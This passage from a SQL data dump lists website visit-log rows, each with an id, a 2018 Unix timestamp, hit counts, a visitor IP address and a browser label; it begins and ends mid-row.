'54.36.148.154','other'),(249681,1527176222,1,0,1,0,'66.249.64.30',''),(249682,1527176405,1,1,0,0,'54.36.149.40','other'),(249683,1527176408,1,1,0,0,'54.36.148.188','other'),(249684,1527176489,1,1,0,0,'54.36.149.95','other'),(249685,1527176587,1,1,0,0,'54.36.148.125','other'),(249686,1527177085,1,1,0,0,'188.230.43.254','other'),(249687,1527177301,1,1,0,0,'54.36.148.213','other'),(249688,1527178330,1,0,1,0,'66.249.64.29',''),(249689,1527178366,1,1,0,0,'54.36.149.14','other'),(249690,1527178392,1,1,0,0,'141.8.142.74','other'),(249691,1527178508,1,1,0,0,'54.36.148.55','other'),(249692,1527178561,1,1,0,0,'54.36.148.35','other'),(249693,1527179409,1,1,0,0,'54.36.148.82','other'),(249694,1527179487,1,1,0,0,'188.230.43.254','other'),(249695,1527179549,1,1,0,0,'54.36.148.200','other'),(249696,1527179650,1,1,0,0,'54.36.148.36','other'),(249697,1527179842,1,1,0,0,'54.36.148.98','other'),(249698,1527180000,1,1,0,0,'54.36.148.41','other'),(249699,1527180203,1,1,0,0,'8.29.198.26','other'),(249700,1527180328,1,1,0,0,'54.36.149.71','other'),(249701,1527180376,1,1,0,0,'54.36.148.150','other'),(249702,1527180674,1,0,1,0,'66.249.64.29',''),(249703,1527180814,1,1,0,0,'217.69.133.194','other'),(249704,1527180817,1,1,0,0,'217.69.133.9','other'),(249705,1527180871,1,1,0,0,'40.77.167.52','other'),(249706,1527180897,1,1,0,0,'54.36.148.203','other'),(249707,1527181041,1,1,0,0,'54.36.148.41','other'),(249708,1527181621,1,1,0,0,'54.36.149.106','other'),(249709,1527181910,1,1,0,0,'54.36.149.8','other'),(249710,1527182387,1,1,0,0,'178.154.171.88','other'),(249711,1527182392,1,1,0,0,'141.8.142.74','other'),(249712,1527182474,1,1,0,0,'40.77.167.22','other'),(249713,1527182910,1,1,0,0,'54.36.148.178','other'),(249714,1527182972,1,1,0,0,'193.106.30.99','firefox'),(249715,1527183288,1,1,0,0,'54.36.148.60','other'),(249716,1527183322,1,1,0,0,'54.36.148.58','other'),(249717,1527183537,1,1,0,0,'54.36.149.97','other'),(249718,1527184051,1,1,0,0,'54.36.148.90','other'),(249719,1527184277,1,1,0,0,'54.36.148.234','other'),(249720,1527184529,2,2,0,0,'178.154.171.88','other'),(249721,1527184640,1,1,0,0,'54.36.148.45','other'),(249722,1527184770,1,1,0,0,'141.8.132.22','other'),(249723,1527185132,1,1,0,0,'54.36.148.227','other'),(249724,1527185310,1,1,0,0,'54.36.148.244','other'),(249725,1527185610,1,1,0,0,'141.8.142.74','other'),(249726,1527185696,2,2,0,0,'178.92.74.8','chrome'),(249727,1527185706,1,1,0,0,'207.46.13.183','other'),(249728,1527185712,1,1,0,0,'8.29.198.27','other'),(249729,1527185807,1,1,0,0,'66.249.64.30','chrome'),(249730,1527186076,1,1,0,0,'86.110.117.10','chrome'),(249731,1527186450,1,1,0,0,'54.36.148.187','other'),(249732,1527186535,1,1,0,0,'95.216.19.126','other'),(249733,1527187311,1,1,0,0,'217.69.133.2','other'),(249734,1527187408,1,1,0,0,'54.36.148.67','other'),(249735,1527187445,1,1,0,0,'95.85.232.248','chrome'),(249736,1527187483,1,1,0,0,'173.208.206.50','other'),(249737,1527187500,1,1,0,0,'91.196.178.132','chrome'),(249738,1527187575,1,1,0,0,'54.36.148.205','other'),(249739,1527187699,1,1,0,0,'54.36.148.109','other'),(249740,1527188438,1,1,0,0,'54.36.149.60','other'),(249741,1527188570,1,1,0,0,'54.36.148.189','other'),(249742,1527188585,1,1,0,0,'54.36.149.36','other'),(249743,1527188877,1,1,0,0,'54.36.148.89','other'),(249744,1527189130,1,1,0,0,'216.244.66.249','other'),(249745,1527189553,1,1,0,0,'54.36.148.144','other'),(249746,1527189729,1,1,0,0,'141.8.142.74','other'),(249747,1527189871,1,1,0,0,'217.69.133.4','other'),(249748,1527190100,1,1,0,0,'54.36.149.13','other'),(249749,1527190206,1,1,0,0,'54.36.148.173','other'),(249750,1527190278,2,0,2,0,'66.249.64.28',''),(249751,1527190297,1,1,0,0,'54.36.148.111','other'),(249752,1527190427,1,1,0,0,'54.36.148.198','other'),(249753,1527190534,1,1,0,0,'54.36.149.101','other'),(249754,1527190968,1,1,0,0,'91.196.178.133','firefox'),(249755,1527191052,1,1,0,0,'8.29.198.27','other'),(249756,1527191098,1,1,0,0,'54.36.148.14','other'),(249757,1527191156,1,1,0,0,'195.10.210.70','chrome'),(249758,1527191530,1,1,0,0,'95.132.24.209','chrome'),(249759,1527191844,1,1,0,0,'54.36.148.122','other'),(249760,1527192009,1,1,0,0,'54.36.148.204','other'),(249761,1527192080,1,0,1,0,'66.249.64.30',''),(249762,1527192509,1,1,0,0,'54.36.149.71','other'),(249763,1527192893,1,1,0,0,'54.36.148.207','other'),(249764,1527193066,1,1,0,0,'54.36.148.110','other'),(249765,1527193198,1,1,0,0,'54.36.149.38','other'),(249766,1527193507,1,1,0,0,'54.36.148.25','other'),(249767,1527193792,1,1,0,0,'54.36.148.122','other'),(249768,1527193810,1,1,0,0,'54.36.149.48','other'),(249769,1527194042,1,1,0,0,'54.36.148.234','other'),(249770,1527194131,1,1,0,0,'54.36.148.53','other'),(249771,1527194615,1,1,0,0,'54.36.148.246','other'),(249772,1527194812,1,1,0,0,'40.77.167.1','other'),(249773,1527194935,4,4,0,0,'174.138.7.50','other'),(249774,1527194940,1,1,0,0,'54.36.148.253','other'),(249775,1527195098,1,1,0,0,'91.121.109.55','other'),(249776,1527195151,1,0,1,0,'66.249.70.27',''),(249777,1527195401,1,1,0,0,'54.36.149.23','other'),(249778,1527195568,1,1,0,0,'54.36.148.134','other'),(249779,1527195859,1,1,0,0,'54.36.148.66','other'),(249780,1527195899,1,1,0,0,'54.36.148.126','other'),(249781,1527195985,1,1,0,0,'174.138.7.50','other'),(249782,1527196183,1,1,0,0,'54.36.148.72','other'),(249783,1527196226,1,1,0,0,'54.36.148.153','other'),(249784,1527196476,1,1,0,0,'54.36.148.238','other'),(249785,1527196849,1,1,0,0,'141.8.142.74','other'),(249786,1527196997,1,1,0,0,'65.19.138.35','other'),(249787,1527197745,1,1,0,0,'54.36.148.67','other'),(249788,1527197854,1,1,0,0,'141.8.142.74','other'),(249789,1527197966,1,0,1,0,'66.249.64.16',''),(249790,1527198263,1,1,0,0,'54.36.149.103','other'),(249791,1527198301,1,1,0,0,'54.36.149.6','other'),(249792,1527198359,1,0,1,0,'66.249.64.28',''),(249793,1527198414,1,1,0,0,'178.154.171.88','other'),(249794,1527199682,1,1,0,0,'54.36.148.229','other'),(249795,1527200275,1,1,0,0,'54.36.149.87','other'),(249796,1527200378,1,1,0,0,'54.36.148.175','other'),(249797,1527200510,1,1,0,0,'54.36.149.4','other'),(249798,1527201074,1,1,0,0,'141.8.142.74','other'),(249799,1527201214,1,1,0,0,'157.55.39.75','other'),(249800,1527201383,1,1,0,0,'54.36.149.90','other'),(249801,1527201905,1,1,0,0,'8.29.198.25','other'),(249802,1527202263,1,1,0,0,'54.36.148.167','other'),(249803,1527202557,1,1,0,0,'54.36.148.50','other'),(249804,1527203104,1,1,0,0,'54.36.149.97','other'),(249805,1527203129,1,1,0,0,'54.36.148.113','other'),(249806,1527203892,1,1,0,0,'54.36.148.77','other'),(249807,1527204100,1,1,0,0,'216.244.66.249','other'),(249808,1527204263,1,1,0,0,'54.165.59.7','other'),(249809,1527204276,1,1,0,0,'54.36.148.249','other'),(249810,1527204424,1,1,0,0,'54.36.148.174','other'),(249811,1527204539,1,1,0,0,'66.249.64.30','chrome'),(249812,1527205268,1,1,0,0,'54.36.149.44','other'),(249813,1527205673,1,1,0,0,'216.244.66.249','other'),(249814,1527206166,1,1,0,0,'54.36.149.30','other'),(249815,1527206170,1,1,0,0,'54.36.148.153','other'),(249816,1527206905,1,1,0,0,'54.36.149.59','other'),(249817,1527207050,1,1,0,0,'54.36.148.52','other'),(249818,1527207395,1,1,0,0,'54.36.148.106','other'),(249819,1527207626,1,1,0,0,'54.36.148.51','other'),(249820,1527207671,1,0,1,0,'66.249.64.29',''),(249821,1527207831,1,1,0,0,'8.29.198.25','other'),(249822,1527207875,1,1,0,0,'54.36.149.59','other'),(249823,1527208082,1,1,0,0,'54.36.148.250','other'),(249824,1527208415,1,1,0,0,'213.180.203.40','other'),(249825,1527208606,1,1,0,0,'66.249.64.28','chrome'),(249826,1527208814,1,1,0,0,'157.55.39.168','other'),(249827,1527209123,1,1,0,0,'54.36.149.23','other'),(249828,1527209298,1,1,0,0,'54.36.148.145','other'),(249829,1527209443,1,1,0,0,'54.36.149.92','other'),(249830,1527209691,1,1,0,0,'54.36.148.217','other'),(249831,1527209746,1,1,0,0,'54.36.148.139','other'),(249832,1527209832,1,1,0,0,'54.36.149.107','other'),(249833,1527210018,1,1,0,0,'62.205.134.182','msie'),(249834,1527210127,1,1,0,0,'40.77.167.117','other'),(249835,1527210187,1,1,0,0,'54.36.148.79','other'),(249836,1527210593,1,1,0,0,'66.249.64.30','chrome'),(249837,1527210651,1,1,0,0,'54.36.148.103','other'),(249838,1527211174,1,1,0,0,'13.56.232.243','chrome'),(249839,1527211510,1,1,0,0,'54.36.148.79','other'),(249840,1527211548,1,1,0,0,'157.55.39.168','other'),(249841,1527211780,1,0,1,0,'66.249.64.28',''),(249842,1527212070,1,1,0,0,'54.36.149.20','other'),(249843,1527212226,1,1,0,0,'54.36.148.41','other'),(249844,1527212245,1,1,0,0,'54.36.149.60','other'),(249845,1527212735,1,1,0,0,'193.106.30.99','firefox'),(249846,1527212770,1,1,0,0,'8.29.198.27','other'),(249847,1527212904,1,1,0,0,'54.36.148.127','other'),(249848,1527213061,1,0,1,0,'66.249.64.30',''),(249849,1527213197,1,1,0,0,'217.69.133.2','other'),(249850,1527213447,1,1,0,0,'5.45.75.6','chrome'),(249851,1527213619,2,2,0,0,'178.154.171.88','other'),(249852,1527213735,1,1,0,0,'54.36.149.67','other'),(249853,1527213993,1,1,0,0,'54.36.148.78','other'),(249854,1527214112,1,0,1,0,'66.249.64.28',''),(249855,1527214425,1,1,0,0,'80.252.155.198','chrome'),(249856,1527214492,1,1,0,0,'54.36.148.186','other'),(249857,1527214580,1,1,0,0,'217.69.133.3','other'),(249858,1527214793,1,1,0,0,'37.145.64.253','msie'),(249859,1527214947,1,1,0,0,'54.36.148.55','other'),(249860,1527215004,1,1,0,0,'54.36.149.45','other'),(249861,1527215029,1,1,0,0,'54.36.148.213','other'),(249862,1527216014,1,1,0,0,'54.36.148.56','other'),(249863,1527216728,1,0,1,0,'66.249.64.28',''),(249864,1527217043,1,0,1,0,'66.249.64.30',''),(249865,1527217085,1,1,0,0,'54.36.149.4','other'),(249866,1527217545,1,1,0,0,'54.36.149.16','other'),(249867,1527217847,1,1,0,0,'54.36.149.66','other'),(249868,1527218044,1,1,0,0,'47.96.231.74','other'),(249869,1527218671,1,1,0,0,'8.29.198.26','other'),(249870,1527218729,1,0,1,0,'66.249.64.28',''),(249871,1527218770,1,1,0,0,'54.36.148.166','other'),(249872,1527219340,1,1,0,0,'217.69.133.194','other'),(249873,1527219608,1,1,0,0,'54.36.148.221','other'),(249874,1527220123,1,1,0,0,'54.36.149.20','other'),(249875,1527220691,1,1,0,0,'54.36.148.251','other'),(249876,1527220794,1,1,0,0,'54.36.148.181','other'),(249877,1527220856,1,1,0,0,'54.36.148.231','other'),(249878,1527220890,1,1,0,0,'141.8.142.74','other'),(249879,1527221412,1,1,0,0,'54.36.149.43','other'),(249880,1527221507,1,1,0,0,'54.36.148.238','other'),(249881,1527221746,1,1,0,0,'216.244.66.237','other'),(249882,1527221922,1,1,0,0,'54.36.148.24','other'),(249883,1527222158,1,1,0,0,'54.36.148.16','other'),(249884,1527222186,1,1,0,0,'95.135.47.18','firefox'),(249885,1527222423,1,1,0,0,'54.36.148.238','other'),(249886,1527222469,1,1,0,0,'54.36.148.137','other'),(249887,1527223100,1,1,0,0,'54.36.148.134','other'),(249888,1527223192,1,1,0,0,'54.36.149.80','other'),(249889,1527223587,1,1,0,0,'157.55.39.168','other'),(249890,1527223618,1,1,0,0,'8.29.198.26','other'),(249891,1527223701,1,1,0,0,'141.8.142.74','other'),(249892,1527224044,1,1,0,0,'54.36.148.163','other'),(249893,1527224570,1,1,0,0,'54.36.149.9','other'),(249894,1527224841,1,1,0,0,'141.8.142.74','other'),(249895,1527224902,1,1,0,0,'54.36.149.82','other'),(249896,1527224915,2,2,0,0,'217.69.133.9','other'),(249897,1527225832,1,1,0,0,'54.36.148.22','other'),(249898,1527226009,1,1,0,0,'217.69.133.194','other'),(249899,1527226212,1,1,0,0,'54.36.148.161','other'),(249900,1527226579,1,1,0,0,'54.36.148.111','other'),(249901,1527226742,1,0,1,0,'66.249.64.28',''),(249902,1527226763,1,1,0,0,'54.36.148.28','other'),(249903,1527227032,1,1,0,0,'216.244.66.237','other'),(249904,1527227187,1,1,0,0,'54.36.148.227','other'),(249905,1527227351,1,1,0,0,'95.132.112.34','firefox'),(249906,1527227511,1,1,0,0,'54.36.149.103','other'),(249907,1527227660,1,1,0,0,'180.76.15.31','other'),(249908,1527228006,1,1,0,0,'54.36.148.149','other'),(249909,1527228022,1,0,1,0,'66.249.64.29',''),(249910,1527228110,1,1,0,0,'91.196.178.68','chrome'),(249911,1527228135,1,1,0,0,'54.36.149.79','other'),(249912,1527228163,1,1,0,0,'91.124.182.170','firefox'),(249913,1527228417,1,1,0,0,'62.205.134.182','msie'),(249914,1527228468,1,1,0,0,'216.244.66.237','other'),(249915,1527228504,1,1,0,0,'95.132.112.34','firefox'),(249916,1527228861,1,1,0,0,'37.147.102.140','msie'),(249917,1527228929,1,1,0,0,'37.55.77.44','chrome'),(249918,1527229501,1,1,0,0,'8.29.198.25','other'),(249919,1527229953,1,1,0,0,'54.36.149.44','other'),(249920,1527230053,1,1,0,0,'54.36.148.25','other'),(249921,1527230122,1,1,0,0,'54.36.149.54','other'),(249922,1527230129,1,1,0,0,'62.205.134.182','msie'),(249923,1527230357,2,2,0,0,'91.196.178.49','chrome'),(249924,1527230406,1,1,0,0,'54.36.148.135','other'),(249925,1527230592,1,1,0,0,'46.200.38.230','firefox'),(249926,1527230776,1,1,0,0,'216.244.66.249','other'),(249927,1527231009,1,1,0,0,'54.36.149.90','other'),(249928,1527231248,1,1,0,0,'62.205.134.182','msie'),(249929,1527232651,1,1,0,0,'54.36.149.72','other'),(249930,1527232882,1,1,0,0,'31.134.208.29','chrome'),(249931,1527232894,1,1,0,0,'54.36.149.105','other'),(249932,1527232895,1,1,0,0,'54.36.149.68','other'),(249933,1527233521,1,1,0,0,'54.36.148.161','other'),(249934,1527233674,1,1,0,0,'178.154.171.88','other'),(249935,1527234344,1,1,0,0,'180.76.15.137','other'),(249936,1527234356,1,0,1,0,'66.249.64.30',''),(249937,1527234434,1,1,0,0,'54.36.148.254','other'),(249938,1527234458,1,1,0,0,'8.29.198.26','other'),(249939,1527234528,1,1,0,0,'54.36.149.27','other'),(249940,1527234875,1,1,0,0,'54.36.149.62','other'),(249941,1527235110,1,1,0,0,'54.36.148.86','other'),(249942,1527235260,2,2,0,0,'91.196.178.161','chrome'),(249943,1527235500,1,1,0,0,'216.244.66.249','other'),(249944,1527235545,1,1,0,0,'54.36.148.72','other'),(249945,1527235559,1,1,0,0,'54.36.148.177','other'),(249946,1527235610,1,1,0,0,'54.36.148.62','other'),(249947,1527235705,1,1,0,0,'91.196.178.14','chrome'),(249948,1527236227,1,1,0,0,'54.36.148.103','other'),(249949,1527236264,1,1,0,0,'217.69.133.6','other'),(249950,1527236791,1,0,1,0,'66.249.64.29',''),(249951,1527236813,1,1,0,0,'54.36.149.73','other'),(249952,1527237058,1,1,0,0,'216.244.66.249','other'),(249953,1527237105,1,1,0,0,'54.36.148.39','other'),(249954,1527237351,1,1,0,0,'54.36.148.48','other'),(249955,1527237404,1,1,0,0,'62.205.134.182','msie'),(249956,1527237459,1,1,0,0,'54.36.148.125','other'),(249957,1527237683,1,1,0,0,'54.36.149.50','other'),(249958,1527238338,1,0,1,0,'66.249.64.30',''),(249959,1527238637,1,1,0,0,'54.36.148.245','other'),(249960,1527238735,1,1,0,0,'54.36.149.52','other'),(249961,1527238862,1,1,0,0,'54.36.148.218','other'),(249962,1527238868,2,2,0,0,'91.196.178.68','chrome'),(249963,1527238969,1,1,0,0,'54.36.149.76','other'),(249964,1527239470,1,1,0,0,'54.36.148.178','other'),(249965,1527239476,1,1,0,0,'31.134.113.116','other'),(249966,1527239688,1,1,0,0,'54.36.148.249','other'),(249967,1527239717,2,2,0,0,'216.244.66.237','other'),(249968,1527239770,1,1,0,0,'54.36.149.66','other'),(249969,1527239964,1,1,0,0,'54.36.149.15','other'),(249970,1527240205,1,1,0,0,'107.167.108.246','other'),(249971,1527240265,1,1,0,0,'217.69.133.203','other'),(249972,1527240294,1,1,0,0,'54.36.148.203','other'),(249973,1527240330,1,1,0,0,'8.29.198.27','other'),(249974,1527240509,1,1,0,0,'77.222.134.101','chrome'),(249975,1527240513,1,1,0,0,'54.36.148.90','other'),(249976,1527240619,1,1,0,0,'54.36.148.119','other'),(249977,1527240655,2,2,0,0,'91.196.178.68','chrome'),(249978,1527240720,1,1,0,0,'54.36.148.48','other'),(249979,1527241211,1,1,0,0,'54.36.149.46','other'),(249980,1527241317,1,0,1,0,'66.249.64.30',''),(249981,1527241672,1,1,0,0,'54.36.148.46','other'),(249982,1527241749,2,2,0,0,'91.196.178.169','chrome'),(249983,1527242386,1,1,0,0,'54.36.148.233','other'),(249984,1527242391,1,1,0,0,'54.36.148.251','other'),(249985,1527242595,1,1,0,0,'141.8.142.74','other'),(249986,1527242641,1,1,0,0,'54.36.149.38','other'),(249987,1527242801,1,1,0,0,'54.36.148.123','other'),(249988,1527243301,1,1,0,0,'54.36.148.246','other'),(249989,1527243472,1,1,0,0,'54.36.149.63','other'),(249990,1527243495,21,21,0,0,'69.30.198.202','other'),(249991,1527243609,1,1,0,0,'54.36.148.215','other'),(249992,1527243750,1,1,0,0,'54.36.148.73','other'),(249993,1527243794,1,1,0,0,'54.36.148.235','other'),(249994,1527243911,1,1,0,0,'54.36.148.190','other'),(249995,1527243990,1,1,0,0,'91.196.178.89','firefox'),(249996,1527244523,1,1,0,0,'141.8.142.74','other'),(249997,1527244850,1,1,0,0,'178.154.171.88','other'),(249998,1527245110,1,1,0,0,'91.196.178.133','firefox'),(249999,1527245114,2,2,0,0,'216.244.66.237','other'),(250000,1527245180,1,1,0,0,'54.36.149.105','other'),(250001,1527245317,1,1,0,0,'8.29.198.25','other'),(250002,1527245452,1,1,0,0,'54.36.148.208','other'),(250003,1527245709,1,1,0,0,'54.36.148.84','other'),(250004,1527245743,1,1,0,0,'54.36.148.107','other'),(250005,1527245842,13,13,0,0,'69.30.198.178','other'),(250006,1527246146,2,2,0,0,'91.196.178.102','chrome'),(250007,1527246314,1,1,0,0,'54.36.148.72','other'),(250008,1527246561,97,97,0,0,'54.80.97.221','other'),(250009,1527247093,1,1,0,0,'176.118.147.162','chrome'),(250010,1527247355,1,0,1,0,'66.249.64.28',''),(250011,1527247623,2,2,0,0,'91.196.177.46','chrome'),(250012,1527247855,2,2,0,0,'217.76.195.174','chrome'),(250013,1527248092,1,1,0,0,'216.244.66.237','other'),(250014,1527248345,1,0,1,0,'66.249.64.30',''),(250015,1527248951,9,9,0,0,'108.59.8.80','other'),(250016,1527249338,1,1,0,0,'54.36.148.109','other'),(250017,1527249418,1,1,0,0,'216.244.66.249','other'),(250018,1527249577,1,1,0,0,'54.36.148.172','other'),(250019,1527249609,1,1,0,0,'54.36.149.13','other'),(250020,1527249611,1,1,0,0,'54.36.149.29','other'),(250021,1527249864,1,1,0,0,'54.36.148.210','other'),(250022,1527250224,1,1,0,0,'62.205.134.182','msie'),(250023,1527250519,1,0,1,0,'66.249.64.29',''),(250024,1527250555,2,2,0,0,'94.179.42.159','chrome'),(250025,1527250635,1,1,0,0,'54.36.148.40','other'),(250026,1527250666,1,1,0,0,'54.36.148.181','other'),(250027,1527250769,1,1,0,0,'54.36.148.58','other'),(250028,1527250890,3,3,0,0,'212.80.60.91','chrome'),(250029,1527251173,1,1,0,0,'8.29.198.27','other'),(250030,1527251283,1,1,0,0,'141.8.142.74','other'),(250031,1527251970,1,1,0,0,'54.36.148.142','other'),(250032,1527252144,1,1,0,0,'54.36.148.147','other'),(250033,1527252582,1,1,0,0,'54.36.149.83','other'),(250034,1527252592,1,1,0,0,'54.36.148.227','other'),(250035,1527252730,1,1,0,0,'54.36.148.168','other'),(250036,1527253124,1,1,0,0,'54.36.148.61','other'),(250037,1527253452,1,1,0,0,'91.209.11.236','other'),(250038,1527253501,1,0,1,0,'66.249.64.30',''),(250039,1527253563,1,1,0,0,'46.219.219.8','chrome'),(250040,1527254241,2,2,0,0,'216.244.66.249','other'),(250041,1527254272,1,1,0,0,'195.69.223.246','other'),(250042,1527254409,1,1,0,0,'54.36.149.104','other'),(250043,1527254608,1,1,0,0,'54.36.148.132','other'),(250044,1527254656,1,1,0,0,'54.36.148.119','other'),(250045,1527254809,1,1,0,0,'54.36.149.20','other'),(250046,1527254920,2,2,0,0,'178.92.74.8','chrome'),(250047,1527254938,1,1,0,0,'91.196.178.65','chrome'),(250048,1527255162,1,1,0,0,'54.36.148.143','other'),(250049,1527255379,1,1,0,0,'54.36.148.223','other'),(250050,1527256070,1,1,0,0,'80.252.155.198','firefox'),(250051,1527256169,1,1,0,0,'8.29.198.26','other'),(250052,1527256515,1,1,0,0,'54.36.148.23','other'),(250053,1527257147,1,1,0,0,'54.36.148.87','other'),(250054,1527257321,1,1,0,0,'54.36.148.46','other'),(250055,1527257346,1,1,0,0,'54.36.149.58','other'),(250056,1527257560,1,1,0,0,'216.244.66.249','other'),(250057,1527257722,1,1,0,0,'54.36.148.132','other'),(250058,1527257803,1,1,0,0,'54.36.148.49','other'),(250059,1527258002,2,2,0,0,'162.210.196.100','other'),(250060,1527258070,1,1,0,0,'54.36.148.92','other'),(250061,1527258117,1,1,0,0,'216.244.66.237','other'),(250062,1527258738,1,1,0,0,'141.8.142.74','other'),(250063,1527259036,1,1,0,0,'78.111.185.66','chrome'),(250064,1527259364,1,1,0,0,'54.36.148.113','other'),(250065,1527259731,1,1,0,0,'188.230.43.254','other'),(250066,1527260051,2,2,0,0,'91.196.178.58','chrome'),(250067,1527260257,1,1,0,0,'54.36.148.107','other'),(250068,1527260307,1,1,0,0,'54.36.149.13','other'),(250069,1527260382,1,1,0,0,'62.205.134.182','msie'),(250070,1527260449,1,1,0,0,'54.36.148.175','other'),(250071,1527260603,1,1,0,0,'87.250.224.46','other'),(250072,1527260719,1,1,0,0,'54.36.149.76','other'),(250073,1527261046,1,1,0,0,'54.36.148.227','other'),(250074,1527261106,2,2,0,0,'54.36.148.38','other'),(250075,1527261203,1,1,0,0,'141.8.142.74','other'),(250076,1527261224,1,1,0,0,'54.36.148.37','other'),(250077,1527261246,1,1,0,0,'54.36.148.45','other'),(250078,1527261640,1,1,0,0,'54.36.148.192','other'),(250079,1527261782,1,1,0,0,'91.196.178.81','chrome'),(250080,1527262013,1,1,0,0,'8.29.198.27','other'),(250081,1527262139,1,1,0,0,'188.230.43.254','other'),(250082,1527262506,1,1,0,0,'216.244.66.237','other'),(250083,1527262665,1,1,0,0,'54.36.148.193','other'),(250084,1527263028,1,1,0,0,'54.36.148.199','other'),(250085,1527263276,1,1,0,0,'54.36.149.43','other'),(250086,1527263350,1,1,0,0,'54.36.149.6','other'),(250087,1527263482,1,1,0,0,'54.36.148.106','other'),(250088,1527264067,1,1,0,0,'142.4.200.37','other'),(250089,1527264529,1,1,0,0,'188.230.43.254','other'),(250090,1527264798,1,1,0,0,'54.36.148.21','other'),(250091,1527265120,1,1,0,0,'54.36.149.84','other'),(250092,1527265215,1,1,0,0,'54.36.149.10','other'),(250093,1527266160,1,1,0,0,'54.36.148.135','other'),(250094,1527266475,1,0,1,0,'66.249.64.29',''),(250095,1527266733,1,1,0,0,'178.154.171.88','other'),(250096,1527266764,1,1,0,0,'54.36.149.80','other'),(250097,1527266939,1,1,0,0,'54.36.148.200','other'),(250098,1527267022,1,1,0,0,'8.29.198.25','other'),(250099,1527267056,1,1,0,0,'188.230.43.254','other'),(250100,1527267846,1,1,0,0,'91.196.178.89','firefox'),(250101,1527268145,1,1,0,0,'69.30.226.234','other'),(250102,1527268322,1,1,0,0,'54.36.149.52','other'),(250103,1527268349,1,1,0,0,'216.244.66.249','other'),(250104,1527268359,1,1,0,0,'46.133.83.25','chrome'),(250105,1527268511,1,1,0,0,'54.36.148.238','other'),(250106,1527268596,1,1,0,0,'95.163.255.96','other'),(250107,1527269248,1,1,0,0,'54.36.148.11','other'),(250108,1527269627,1,1,0,0,'54.36.148.114','other'),(250109,1527269789,1,1,0,0,'66.249.70.25','chrome'),(250110,1527269833,1,1,0,0,'204.12.208.10','other'),(250111,1527270169,1,1,0,0,'54.36.149.31','other'),(250112,1527270569,1,1,0,0,'54.36.149.96','other'),(250113,1527270784,1,1,0,0,'54.36.148.40','other'),(250114,1527270787,1,1,0,0,'54.36.149.17','other'),(250115,1527270873,1,1,0,0,'54.36.149.58','other'),(250116,1527271407,1,1,0,0,'37.53.224.204','chrome'),(250117,1527271700,1,1,0,0,'178.154.171.88','other'),(250118,1527272004,1,1,0,0,'54.36.148.149','other'),(250119,1527272218,1,1,0,0,'54.36.148.169','other'),(250120,1527272266,1,1,0,0,'54.36.148.240','other'),(250121,1527272469,1,1,0,0,'54.36.148.252','other'),(250122,1527272566,1,1,0,0,'54.36.148.153','other'),(250123,1527272814,1,1,0,0,'54.36.148.104','other'),(250124,1527272853,1,1,0,0,'8.29.198.27','other'),(250125,1527273806,1,1,0,0,'180.76.15.161','other'),(250126,1527273896,1,1,0,0,'46.201.112.213','chrome'),(250127,1527274414,1,1,0,0,'207.46.13.131','other'),(250128,1527274905,1,1,0,0,'66.249.64.29','chrome'),(250129,1527274973,1,1,0,0,'54.36.148.148','other'),(250130,1527275052,1,1,0,0,'54.36.148.128','other'),(250131,1527275236,1,1,0,0,'54.36.148.159','other'),(250132,1527275294,1,1,0,0,'157.55.39.168','other'),(250133,1527276054,1,1,0,0,'54.36.148.120','other'),(250134,1527276132,1,1,0,0,'54.36.149.45','other'),(250135,1527276133,1,1,0,0,'54.36.148.207','other'),(250136,1527276359,1,1,0,0,'216.244.66.241','other'),(250137,1527276411,1,1,0,0,'178.154.171.88','other'),(250138,1527276677,1,1,0,0,'54.36.148.231','other'),(250139,1527276768,1,0,1,0,'66.249.64.30',''),(250140,1527276889,1,1,0,0,'54.36.148.133','other'),(250141,1527276922,1,1,0,0,'54.36.148.230','other'),(250142,1527277293,1,1,0,0,'157.55.39.190','other'),(250143,1527277394,2,2,0,0,'78.46.86.235','other'),(250144,1527277751,1,1,0,0,'141.8.142.74','other'),(250145,1527277754,1,1,0,0,'54.36.149.54','other'),(250146,1527277791,1,1,0,0,'66.249.70.27','chrome'),(250147,1527277861,1,1,0,0,'54.36.148.135','other'),(250148,1527277888,1,1,0,0,'8.29.198.25','other'),(250149,1527278482,1,1,0,0,'54.36.149.34','other'),(250150,1527278732,1,1,0,0,'54.36.148.116','other'),(250151,1527278778,1,1,0,0,'54.36.148.182','other'),(250152,1527278806,1,1,0,0,'54.36.148.47','other'),(250153,1527279136,1,1,0,0,'54.36.148.166','other'),(250154,1527279154,2,2,0,0,'95.163.255.93','other'),(250155,1527279279,1,1,0,0,'178.154.171.88','other'),(250156,1527279613,1,1,0,0,'141.8.132.19','other'),(250157,1527279787,1,1,0,0,'54.36.148.207','other'),(250158,1527279883,1,1,0,0,'180.76.15.12','other'),(250159,1527280028,1,1,0,0,'180.76.15.140','other'),(250160,1527280084,1,1,0,0,'141.8.142.167','other'),(250161,1527280180,1,1,0,0,'54.36.149.95','other'),(250162,1527280214,1,1,0,0,'54.36.148.94','other'),(250163,1527280262,1,1,0,0,'54.36.149.59','other'),(250164,1527280289,2,2,0,0,'216.244.66.241','other'),(250165,1527280402,1,1,0,0,'95.163.255.99','other'),(250166,1527280555,1,1,0,0,'54.36.149.76','other'),(250167,1527280937,1,1,0,0,'54.36.149.75','other'),(250168,1527281249,1,1,0,0,'54.36.148.238','other'),(250169,1527281443,2,2,0,0,'54.36.148.36','other'),(250170,1527281914,1,1,0,0,'54.36.148.154','other'),(250171,1527281951,1,1,0,0,'216.244.66.241','other'),(250172,1527282148,1,1,0,0,'54.36.148.153','other'),(250173,1527282175,1,1,0,0,'54.36.148.252','other'),(250174,1527282558,1,1,0,0,'54.36.148.41','other'),(250175,1527283123,3,3,0,0,'216.244.66.241','other'),(250176,1527283363,1,1,0,0,'141.8.142.74','other'),(250177,1527283688,1,1,0,0,'8.29.198.26','other'),(250178,1527283953,1,1,0,0,'128.72.84.237','msie'),(250179,1527284193,1,1,0,0,'54.36.148.202','other'),(250180,1527284346,1,1,0,0,'61.154.29.32','other'),(250181,1527284591,1,1,0,0,'54.36.148.144','other'),(250182,1527284651,1,1,0,0,'216.244.66.241','other'),(250183,1527285139,1,0,1,0,'66.249.64.29',''),(250184,1527285256,1,1,0,0,'54.36.148.150','other'),(250185,1527285445,2,2,0,0,'141.8.142.74','other'),(250186,1527285455,1,1,0,0,'54.36.149.3','other'),(250187,1527285558,1,1,0,0,'95.163.255.92','other'),(250188,1527285952,1,1,0,0,'216.244.66.241','other'),(250189,1527285996,1,1,0,0,'207.46.13.131','other'),(250190,1527286173,1,0,1,0,'66.249.64.30',''),(250191,1527286482,1,1,0,0,'54.36.148.222','other'),(250192,1527286862,1,1,0,0,'54.36.148.234','other'),(250193,1527287006,1,1,0,0,'216.244.66.241','other'),(250194,1527287196,1,1,0,0,'54.36.148.